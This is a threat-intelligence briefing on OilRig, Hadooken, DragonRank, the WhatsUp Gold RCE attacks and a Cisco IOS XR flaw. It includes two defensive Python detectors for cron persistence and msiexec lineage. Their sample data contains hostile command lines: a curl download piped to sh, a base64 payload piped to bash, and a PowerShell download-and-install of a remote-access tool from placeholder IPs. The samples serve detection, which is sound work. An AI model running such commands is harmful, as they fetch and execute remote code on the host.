Cyware Daily Threat Intelligence
Daily Threat Briefing • Sep 12, 2024
OilRig is turning up the heat in Iraq, targeting high-profile government networks. With new malware families, Veaty and Spearal, at their disposal, the group is executing PowerShell commands and harvesting critical files.
DragonRank, a newly discovered threat activity cluster, is spreading across Asia and Europe, leveraging web shells and SEO manipulation to compromise web applications. The group behind DragonRank has already targeted over 35 IIS servers across multiple countries.
Meanwhile, attackers are exploiting critical vulnerabilities in Progress Software's WhatsUp Gold, abusing its legitimate Active Monitor PowerShell Script feature to drop remote access tools on the very systems that monitor the network.
OilRig targets Iraqi government
The Iranian state-sponsored threat actor OilRig launched a sophisticated campaign against Iraqi government networks, including the Prime Minister's Office and the Ministry of Foreign Affairs. The campaign uses two new malware families, Veaty and Spearal, which execute PowerShell commands and harvest files from infected hosts. Check Point also found a third backdoor that tunnels over SSH, tied to the same actor infrastructure, and an HTTP-based backdoor, CacheHttp.dll, that targets Microsoft IIS servers.
New Linux malware targets WebLogic servers
Aqua Nautilus uncovered a new Linux malware, known as Hadooken, targeting Oracle WebLogic servers. The attackers gained access through weak WebLogic passwords and used it to run code remotely. On execution, Hadooken drops the Tsunami malware and deploys a cryptominer. It creates cron jobs for persistence, deletes logs to evade detection, attempts lateral movement by hijacking SSH credentials and known hosts, and hijacks the server's compute resources for mining.
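The cron-based persistence described above is one of the cheapest things to triage on a suspect WebLogic host. The following is an added example (not Aqua Nautilus's code and not derived from Hadooken samples): a small crontab parser plus heuristics that flag jobs running from world-writable staging directories, from hidden directories, via download-and-pipe-to-shell, or via a base64-decoded payload. The crontab content is constructed for the example; the regexes and reason strings are the author's assumptions about what "suspicious" means, so tune them to your environment.

```python
"""Triage cron persistence: parse crontab text and flag suspicious jobs.

Added example for this briefing, not code from the Hadooken report.
On a real host feed it the contents of /etc/crontab, /etc/cron.d/*
(system=True) and `crontab -l -u <user>` output (system=False).
"""
import re

# Constructed sample of a system crontab; the last three entries are the
# kind of jobs a cryptominer dropper leaves behind (not real IOCs).
SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/5 * * * *     root    /tmp/.x/k > /dev/null 2>&1
@reboot         root    curl -s http://203.0.113.9/c.sh | sh
0 3 * * *       weblogic echo aGVsbG8K | base64 -d | bash
"""

# Heuristics (assumed thresholds for this example, not from the report).
CHECKS = [
    (re.compile(r"(^|\s|=)(/tmp|/var/tmp|/dev/shm)/"), "runs from world-writable staging dir"),
    (re.compile(r"/\.[^/\s]+/"), "hidden directory in path"),
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z|da)?sh\b"), "download piped to shell"),
    (re.compile(r"base64\s+(-d|--decode)\b"), "base64-decoded payload"),
]


def parse_crontab(text, system=True):
    """Return (schedule, user, command) tuples from crontab text.

    system=True means the file carries a user field (/etc/crontab,
    /etc/cron.d/*); per-user crontabs do not. Comments, blank lines and
    VAR=value lines are skipped, as cron itself skips them.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        n_sched = 1 if line.startswith("@") else 5   # @reboot vs. five time fields
        n_fields = n_sched + (1 if system else 0)
        parts = line.split(None, n_fields)
        if len(parts) < n_fields + 1:
            continue   # malformed line; cron would reject it too
        schedule = " ".join(parts[:n_sched])
        user = parts[n_sched] if system else None
        entries.append((schedule, user, parts[n_fields]))
    return entries


def suspicious_reasons(command):
    """List the heuristics that match a single cron command."""
    return [reason for pattern, reason in CHECKS if pattern.search(command)]


def scan_crontab(text, system=True):
    """Return [(schedule, user, command, reasons)] for entries worth a look."""
    flagged = []
    for schedule, user, command in parse_crontab(text, system):
        reasons = suspicious_reasons(command)
        if reasons:
            flagged.append((schedule, user, command, reasons))
    return flagged


if __name__ == "__main__":
    for schedule, user, command, reasons in scan_crontab(SAMPLE_CRONTAB):
        print(f"[{', '.join(reasons)}] {schedule} {user}: {command}")
```

The parser deliberately mirrors cron's own rules (environment lines and comments ignored, `@reboot`-style shortcuts handled) so that a job hidden among legitimate entries is not skipped by an overly strict reader. Remember that log deletion, also attributed to Hadooken above, means the absence of evidence in /var/log is itself a signal; cron files on disk survive that step.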
**Meet the new DragonRank SEO manipulator service**
Cisco Talos discovered a new threat named DragonRank that targets countries in Asia and some in Europe using PlugX and BadIIS for SEO manipulation. DragonRank infiltrates web applications to deploy web shells, gather system information, and launch malware, along with credential-harvesting tools. The group has compromised over 35 IIS servers in countries including Thailand, India, Korea, Belgium, the Netherlands, and China. DragonRank is linked to a Simplified Chinese-speaking actor through their commercial website and messaging accounts.
RCE attacks on WhatsUp Gold
Trend Micro observed RCE attacks on WhatsUp Gold, a network and IT infrastructure monitoring application from Progress Software Corporation for Windows systems. The attacks exploited CVE-2024-6670 and CVE-2024-6671, which the vendor disclosed on August 16. Both are rated 9.8 (critical) on the CVSS scale and allow an unauthenticated attacker to retrieve encrypted passwords, which is what opens the path to code execution. The attackers then abused the Active Monitor PowerShell Script, a legitimate WhatsUp Gold feature, to run malicious code on the targeted systems. The PowerShell scripts downloaded and installed remote access tools (RATs) via msiexec.exe, including Atera Agent, Radmin, SimpleHelp Remote Access, and Splashtop Remote.
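The chain above (WhatsUp Gold polling process -> PowerShell -> msiexec.exe installing a RAT from a URL) is a lineage pattern that is easy to hunt for in process-creation telemetry. The following is an added example, not Trend Micro's or Progress Software's code: it walks a set of Sysmon-style process-creation events and scores each msiexec.exe launch on its ancestry and command lines. The events are constructed for the example, and the WhatsUp Gold install paths and the poller name NmPoller.exe are assumptions; substitute the parent image your deployment actually shows.

```python
"""Hunt for msiexec.exe launches matching the WhatsUp Gold abuse chain.

Added example for this briefing; not vendor code. The event layout is
Sysmon-like (pid, ppid, image, cmd) and the WhatsUp Gold paths are assumed.
"""
import ntpath
import re

# Assumed install paths for WhatsUp Gold (older Ipswitch and newer Progress).
WHATSUP_DIRS = ("\\ipswitch\\whatsup\\", "\\progress\\whatsup\\")
# RATs named in the report; matched case-insensitively against command lines.
RAT_HINTS = ("atera", "radmin", "simplehelp", "splashtop")
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

# Constructed process-creation events (not real telemetry).
EVENTS = [
    {"pid": 1001, "ppid": 400, "image": r"C:\Program Files (x86)\Ipswitch\WhatsUp\NmPoller.exe",
     "cmd": "NmPoller.exe"},
    {"pid": 1002, "ppid": 1001, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'powershell.exe -NoProfile -Command "Invoke-WebRequest http://203.0.113.5/AteraAgent.msi '
            r'-OutFile C:\Users\Public\setup.msi; msiexec /i C:\Users\Public\setup.msi /quiet"'},
    {"pid": 1003, "ppid": 1002, "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r"msiexec.exe /i C:\Users\Public\setup.msi /quiet"},
    {"pid": 2001, "ppid": 900, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 2002, "ppid": 2001, "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r"msiexec.exe /i C:\Temp\7zip.msi"},                       # benign local install
    {"pid": 2003, "ppid": 2001, "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe"},
    {"pid": 2004, "ppid": 2003, "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": "msiexec.exe /i https://corp.example/tools/notepad.msi"},  # URL only: weak signal
    {"pid": 3001, "ppid": 2001, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -c ..."},
    {"pid": 3002, "ppid": 3001, "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": "msiexec.exe /i https://203.0.113.7/Splashtop_Streamer.msi /qn"},  # URL + RAT name
]


def _basename(image):
    return ntpath.basename(image).lower()


def ancestors(events_by_pid, event):
    """Yield parent, grandparent, ... until the root or a pid cycle."""
    seen = set()
    cur = events_by_pid.get(event["ppid"])
    while cur is not None and cur["pid"] not in seen:
        seen.add(cur["pid"])
        yield cur
        cur = events_by_pid.get(cur["ppid"])


def find_suspicious_msiexec(events, threshold=2):
    """Return [(pid, reasons)] for msiexec.exe launches scoring >= threshold.

    Lineage under a WhatsUp Gold process counts 2 (the strong signal);
    a remote URL and a known RAT name in the command-line chain count 1 each.
    """
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if _basename(e["image"]) != "msiexec.exe":
            continue
        chain = list(ancestors(by_pid, e))
        reasons, score = [], 0
        via_powershell = any(_basename(a["image"]) == "powershell.exe" for a in chain)
        from_whatsup = any(d in a["image"].lower() for a in chain for d in WHATSUP_DIRS)
        if via_powershell and from_whatsup:
            reasons.append("msiexec under PowerShell spawned by a WhatsUp Gold process")
            score += 2
        cmds = " ".join([e["cmd"]] + [a["cmd"] for a in chain]).lower()
        if URL_RE.search(cmds):
            reasons.append("remote URL in command-line chain")
            score += 1
        rat = next((r for r in RAT_HINTS if r in cmds), None)
        if rat:
            reasons.append(f"installer references {rat}")
            score += 1
        if score >= threshold:
            hits.append((e["pid"], reasons))
    return hits


if __name__ == "__main__":
    for pid, reasons in find_suspicious_msiexec(EVENTS):
        print(pid, "; ".join(reasons))
```

The threshold is what keeps an administrator's `msiexec /i https://...` from paging someone: a remote URL alone scores 1, while the poller-to-PowerShell-to-msiexec lineage scores 2 on its own because the monitoring service has no legitimate reason to install software. Baseline the RAT name list against tools your help desk actually uses before relying on that signal.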
**Critical Cisco software flaw patched**
A critical vulnerability (CVE-2024-20304) in the multicast traceroute version 2 (Mtrace2) feature of Cisco IOS XR Software allows an unauthenticated, remote attacker to exhaust the device's UDP packet memory by sending crafted packets. Once that memory is exhausted the device can no longer process UDP traffic properly, resulting in a denial of service (DoS). Devices are affected if they run a vulnerable release of Cisco IOS XR Software with the multicast RPM active; interim mitigations are deactivating the multicast RPM or applying infrastructure access control lists (iACLs) that restrict which sources may send traffic to the device. Cisco has issued software updates to address this and three other vulnerabilities (CVE-2024-20317, CVE-2024-20406, CVE-2024-20398), the last of which is a CLI privilege escalation.